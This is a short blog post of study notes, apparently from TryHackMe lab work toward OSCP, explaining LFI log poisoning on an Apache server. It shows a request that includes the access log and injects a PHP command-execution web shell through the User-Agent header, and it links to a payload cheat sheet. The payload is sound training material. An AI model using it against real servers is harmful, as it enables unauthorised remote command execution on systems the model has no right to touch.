* LFI로 로그 파일을 읽을 수 있어야 로그 포이즈닝 가능
Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server
We will inject some malicious php code into the server's log.
* Note: In order for that to happen, the directory should have read and execute permissions.
The log file is located at the following path: /var/log/apache2/access.log
Can you read the log (Yes/No)? Yes
User-Agent에 PHP코드 주입
버프 Repeter
GET /lfi/lfi.php?page=/var/log/apache2/access.log&lfi=command
User-Agent: <?php system($_GET['lfi']); ?>
LFI 치트시트
github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
LFI to RCE via controlled log file
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
'OSCP > TryHackMe' 카테고리의 다른 글
| [Linux] Linux PrivEsc (0) | 2020.07.07 |
|---|---|
| [Windows] Windows PrivEsc Arena (0) | 2020.06.14 |
| [Linux] Common Linux Privesc (0) | 2020.06.08 |
| [Linux] Network Service (0) | 2020.06.05 |
| [Linux] Erit Securus I (Excellent walkthrough) (0) | 2020.06.04 |